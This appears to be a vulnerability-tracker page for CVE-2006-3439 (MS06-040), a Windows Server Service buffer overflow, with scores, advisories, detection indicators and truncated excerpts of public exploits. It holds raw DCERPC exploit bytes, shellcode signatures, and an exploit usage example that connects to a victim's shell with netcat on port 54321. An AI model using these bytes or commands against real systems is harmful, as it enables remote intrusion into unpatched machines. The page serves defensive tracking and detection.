CVE-2006-3439
published 2006-08-09CVE-2006-3439: Buffer overflow in the Server Service in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 allows remote attackers, including anonymous users, to…
PriorityP276critical10CVSS 2.0
AVNACLAuNCCICAC
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
84.08%
99.7th percentile
Buffer overflow in the Server Service in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 allows remote attackers, including anonymous users, to execute arbitrary code via a crafted RPC message, a different vulnerability than CVE-2006-1314.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x4e\xe6\x40\xbb
bytes↗
DCERPC bind: \x05\x00\x0B\x03\x10\x00\x00\x00\x48\x00\x00\x00\x00\x00\x00\x00\xD0\x16\xD0\x16\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00\xC8\x4F\x32\x4B\x70\x16\xD3\x01\x12\x78\x5A\x47\xBF\x6E\xE1\x88\x03\x00\x00\x00\x04\x5D\x88\x8A\xEB\x1C\xC9\x11\x9F\xE8\x08\x00\x2B\x10\x48\x60\x02\x00\x00\x00
bytes↗
DCERPC request header: \x05\x00\x00\x03\x10\x00\x00\x00\x30\x08\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x1f\x00\xff\xff\xff\xff\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00
- →Detect crafted DCERPC NetpwPathCanonicalize (opnum 0x1f) calls to the srvsvc/browser named pipe over SMB (ports 139/445). The RPC UUID 4b324fc8-1670-01d3-1278-5a47bf6ee188 v3.0 is the target interface. ↗
- →For Windows 2003 SP0 exploitation, look for the constant stack cookie value 0x4e, 0xe6, 0x40, 0xbb embedded in the RPC path argument of a NetpwPathCanonicalize request. ↗
- →Exploit targets anonymous/unauthenticated SMB sessions (empty username/password) to the IPC$ share and then opens the \pipe\browser named pipe. Anomalous unauthenticated IPC$ connections followed by BROWSER pipe access should be alerted. ↗
- →Payload bad characters for this exploit are \x00\x0a\x0d\x5c\x5f\x2f\x2e — IDS/IPS rules inspecting the RPC stub data for oversized path arguments should flag buffers of 600–1100 bytes containing these character exclusions. ↗
- →Stack adjustment prepend bytes \x81\xc4\xff\xef\xff\xff\x44 (sub esp, 0xffffefff / inc esp) appear at the start of shellcode in exploit payloads and can be used as a shellcode signature. ↗
- →Exploit sends the DCERPC request twice if the first attempt returns stub data (server rejection). Two rapid identical opnum 0x1f requests to the same pipe within milliseconds is a strong behavioral indicator. ↗
- →On Windows XP SP2 detection, the exploit checks for error code 0xc0000022 (STATUS_ACCESS_DENIED) when opening \SRVSVC pipe — this probing behavior (opening \SRVSVC before exploitation) can be detected. ↗
- ·Exploitation causes a denial of service (not code execution) on Windows XP SP2 and Windows Server 2003 SP1 due to /GS stack protection; a failed attempt on Windows 2000 causes a full reboot. ↗
- ·The payload space is intentionally limited to 370 bytes to maintain a single request format across all Windows service packs; larger payloads may be technically possible but break cross-SP compatibility. ↗
- ·The exploit supports both direct SMB (port 445) and NetBIOS SMB (port 139) transports; detection rules must cover both ports. ↗
- ·Windows NT 4.0 requires adjusted SMB/DCERPC pipe write sizes (min 2048, max 4096) for successful exploitation; anomalous large pipe write sizes may indicate NT 4.0 targeting. ↗
CVSS provenance
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-6fx8-xxf2-xjj8: Buffer overflow in the Server Service in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 allows remote attackers, including anonymous
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2006-3439 [HIGH] GHSA-6fx8-xxf2-xjj8: Buffer overflow in the Server Service in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 allows remote attackers, including anonymous
Buffer overflow in the Server Service in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 allows remote attackers, including anonymous users, to execute arbitrary code via a crafted RPC message, a different vulnerability than CVE-2006-1314.
VulnCheck
Microsoft Windows Out-of-bounds Write
vulncheck·2006·CVSS 7.5
CVE-2006-3439 [HIGH] Microsoft Windows Out-of-bounds Write
Microsoft Windows Out-of-bounds Write
Buffer overflow in the Server Service in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 allows remote attackers, including anonymous users, to execute arbitrary code via a crafted RPC message, a different vulnerability than CVE-2006-1314.
Affected: Microsoft Windows
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=a9c54f79-d780-437b-a7f5-a74960e299d5&CommunityKey=8af7f28f-02f1-4107-8639-93a60b6546d4&tab=librarydocuments; https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_ju
No detection rules found.
Exploit-DB
Microsoft Server Service - NetpwPathCanonicalize Overflow (MS06-040) (Metasploit)
exploitdb·2011-02-17
CVE-2006-3439 Microsoft Server Service - NetpwPathCanonicalize Overflow (MS06-040) (Metasploit)
Microsoft Server Service - NetpwPathCanonicalize Overflow (MS06-040) (Metasploit)
---
##
# $Id: ms06_040_netapi.rb 11762 2011-02-17 03:56:15Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft Server Service NetpwPathCanonicalize Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the NetApi32 CanonicalizePathName() function
using the NetpwPathCanonicalize RPC call in the Server Service. It is likely that
other RPC calls could be used to exploit this service. This exploit will result in
a denial of
Exploit-DB
Microsoft Windows Server 2003 - NetpIsRemote() Remote Overflow (MS06-040) (Metasploit)
exploitdb·2006-09-13
CVE-2006-3439 Microsoft Windows Server 2003 - NetpIsRemote() Remote Overflow (MS06-040) (Metasploit)
Microsoft Windows Server 2003 - NetpIsRemote() Remote Overflow (MS06-040) (Metasploit)
---
#########################################################################
# netapi_win2003.pm (MS06-040 Exploit for Windows Server 2003 SP0)
#
# Author: Trirat Puttaraksa (Kira)
#
# http://sf-freedom.blogspot.com
#
# For educational purpose only
#
# Note: This exploit is developed because of my question "Is it exploitable
# on Windows Server 2003 platform ?". As I know, Windows XP SP2 and Windows
# Server 2003 SP1 is not exploitable because they are compiled with /GS, but
# how about Windows Server 2003 SP0 ? In metasploit netapi_ms06_040.pm there
# is no Windows Server 2003 sp0 target, this means 2003 SP0 is not
# exploitable ? There is Stack Protection Windows Server 2003, is this the
# reasons w
Exploit-DB
Microsoft Windows - NetpIsRemote() Remote Overflow (MS06-040) (2)
exploitdb·2006-08-28
CVE-2006-3439 Microsoft Windows - NetpIsRemote() Remote Overflow (MS06-040) (2)
Microsoft Windows - NetpIsRemote() Remote Overflow (MS06-040) (2)
---
/*
* MS06-040 Remote Code Execution Proof of Concept
*
* Ported by ub3r st4r aka iRP
* ---------------------------------------------------------------------
* Tested Against:
* Windows XP SP1
* Windows 2000 SP4
*
* Systems Affected:
* Microsoft Windows 2000 SP0-SP4
* Microsoft Windows XP SP0-SP1
* Microsoft Windows NT 4.0
* ---------------------------------------------------------------------
* This is provided as proof-of-concept code only for educational
* purposes and testing by authorized individuals with permission
* to do so.
*
* PRIVATE v.0.2 (08-27-06)
*/
#include
#include
#pragma comment(lib, "mpr")
#pragma comment(lib, "Rpcrt4")
// bind uuid interface: 4b324fc8-1670-01d3-1278-5a47bf6ee188 v3.0
unsigned cha
Exploit-DB
Microsoft Windows - CanonicalizePathName() Remote (MS06-040)
exploitdb·2006-08-19
CVE-2006-3439 Microsoft Windows - CanonicalizePathName() Remote (MS06-040)
Microsoft Windows - CanonicalizePathName() Remote (MS06-040)
---
/*
Microsoft Windows CanonicalizePathName() Remote Overflow MSO6-040
More info: http://www.microsoft.com/technet/security/bulletin/MS06-040.mspx
Written by Preddy
This is another version of hdm's metasploit version but ported to C,
Works against Windows XP SP1
And it should give a crash on Win2k in services.exe
On successfull exploitation it provides a remote shell at port 54321
of your victim:
./ms06 192.168.1.103
Target: 192.168.1.103
Attack Finished: now open a new terminal and nc to your victim on port 54321
Warning: Don't close this window!
[open a new terminal/window/prompt]
nc 192.168.1.103 54321
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
http://www.te
Exploit-DB
Microsoft Windows - NetpIsRemote() Remote Overflow (MS06-040) (Metasploit)
exploitdb·2006-08-10
CVE-2006-3439 Microsoft Windows - NetpIsRemote() Remote Overflow (MS06-040) (Metasploit)
Microsoft Windows - NetpIsRemote() Remote Overflow (MS06-040) (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::netapi_ms06_040;
use base "Msf::Exploit";
use strict;
use Pex::DCERPC;
use Pex::NDR;
my $advanced = {
'FragSize' => [ 256, 'The DCERPC fragment size' ],
'BindEvasion' => [ 0, 'IDS Evasion of the bind request' ],
'DirectSMB' => [ 0, 'Use direct SMB (445/tcp)' ],
};
my $info = {
'Name' => 'Microsoft NetpIsRemote() MSO6-040 Overflo
Metasploit
MS06-040 Microsoft Server Service NetpwPathCanonicalize Overflow
metasploit
MS06-040 Microsoft Server Service NetpwPathCanonicalize Overflow
MS06-040 Microsoft Server Service NetpwPathCanonicalize Overflow
This module exploits a stack buffer overflow in the NetApi32 CanonicalizePathName() function using the NetpwPathCanonicalize RPC call in the Server Service. It is likely that other RPC calls could be used to exploit this service. This exploit will result in a denial of service on Windows XP SP2 or Windows 2003 SP1. A failed exploit attempt will likely result in a complete reboot on Windows 2000 and the termination of all SMB-related services on Windows XP. The default target for this exploit should succeed on Windows NT 4.0, Windows 2000 SP0-SP4+, Windows XP SP0-SP1 and Windows 2003 SP0.
No writeups or analysis indexed.
http://secunia.com/advisories/21388http://securitytracker.com/id?1016667http://www.cisco.com/en/US/products/ps6120/tsd_products_security_response09186a008070c75a.htmlhttp://www.dhs.gov/dhspublic/display?content=5789http://www.kb.cert.org/vuls/id/650769http://www.securityfocus.com/bid/19409http://www.us-cert.gov/cas/techalerts/TA06-220A.htmlhttp://www.vupen.com/english/advisories/2006/3210https://docs.microsoft.com/en-us/security-updates/securitybulletins/2006/ms06-040https://exchange.xforce.ibmcloud.com/vulnerabilities/28002https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A492http://secunia.com/advisories/21388http://securitytracker.com/id?1016667http://www.cisco.com/en/US/products/ps6120/tsd_products_security_response09186a008070c75a.htmlhttp://www.dhs.gov/dhspublic/display?content=5789http://www.kb.cert.org/vuls/id/650769http://www.securityfocus.com/bid/19409http://www.us-cert.gov/cas/techalerts/TA06-220A.htmlhttp://www.vupen.com/english/advisories/2006/3210https://docs.microsoft.com/en-us/security-updates/securitybulletins/2006/ms06-040https://exchange.xforce.ibmcloud.com/vulnerabilities/28002https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A492
2006-08-09
Published
Exploited in the wild